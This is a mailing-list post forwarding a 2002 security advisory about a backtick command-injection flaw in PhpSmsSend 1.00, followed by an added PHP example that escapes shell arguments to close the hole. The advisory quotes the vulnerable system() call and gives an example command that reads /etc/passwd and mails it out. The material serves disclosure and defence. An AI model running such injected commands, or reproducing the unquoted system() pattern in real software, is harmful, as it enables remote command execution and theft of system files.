I think I'm going to start forwarding all the bugtraq alerts for PHP scripts to this list. Any objections?
---------- Forwarded Message ----------
Subject: PhpSmsSend remote execute commands bug
Date: Tue, 29 Jan 2002 18:57:51 +0000 (GMT)
From: Indra Kusuma <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>

---[ PhpSmsSend remote execute commands bug

---[ About PhpSmsSend

PhpSmsSend is a frontend to the SmsSend application. It consists of a .php file, from which you select one of the available scripts, and then you can send an SMS wherever you want, all around the world.

PhpSmssend's website is http://zekiller.skytech.org/smssend.php

---[ Affected System

PhpSmsSystem Version 1.00

---[ Description

from file .php :

    $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
    system($str,$res);

If the SMS message contains a backtick "`", then what is inside the backticks will be executed as a system command. The result of the command will be sent via SMS :), so the command output should be less than 160 characters to send via SMS, but if the command uses a pipe (ex : cat /etc/passwd|mail [EMAIL PROTECTED]) or redirection then the message status is successful :)

---[ Greetz

my Guru GaniSalman, my friend OpsCrew, #indoSniffing and #medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM (lug.stikom.edu), and the gauli.com owner

---
cheers,
IndraKusuma
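
Added example, not part of the forwarded advisory and not PhpSmsSend's own code: one way to build the same smssend command line so that backticks in the message stay literal text. The constant values, the helper name build_smssend_command() and the assumption that $params holds a list of separate values (number, message) are hypothetical.

```php
<?php
// Added example. Constant values below are assumptions, not the project's.
define('SMSSEND', '/usr/bin/smssend');        // assumed install path
define('SCRIPTSPATH', '/usr/share/smssend/'); // assumed provider-script dir
define('PROXY', '');                          // assumed: no proxy configured

// Hypothetical helper: builds the command with every user value quoted.
function build_smssend_command(string $script, array $params): string
{
    // The provider script must be a plain file name: no path separators,
    // no "..", no shell metacharacters.
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $script)
        || strpos($script, '..') !== false) {
        throw new InvalidArgumentException('invalid script name');
    }

    // On Unix, escapeshellarg() wraps a value in single quotes and escapes
    // embedded single quotes. Inside single quotes the shell performs no
    // command substitution, so backticks, pipes and redirections are
    // handed to smssend as ordinary characters.
    $quoted = array_map('escapeshellarg', $params);

    $cmd = escapeshellarg(SMSSEND) . ' '
         . escapeshellarg(SCRIPTSPATH . $script) . ' '
         . implode(' ', $quoted)
         . ' -- -d 0';
    if (PROXY !== '') {
        $cmd .= ' ' . escapeshellarg(PROXY);
    }
    return $cmd;
}

// Constructed sample input: a message that contains backticks.
$cmd = build_smssend_command('provider.sms', ['5551234', 'hello `id` world']);
echo $cmd, PHP_EOL;

// Only now would the command be handed to the shell, as in the original:
// system($cmd, $res);

// A script name carrying shell syntax is rejected before any command is built.
try {
    build_smssend_command('provider.sms; ls', ['5551234', 'hi']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The snippet quoted in the advisory interpolates $script and $params into the string unquoted, which is why the shell started by system() interprets the backticks.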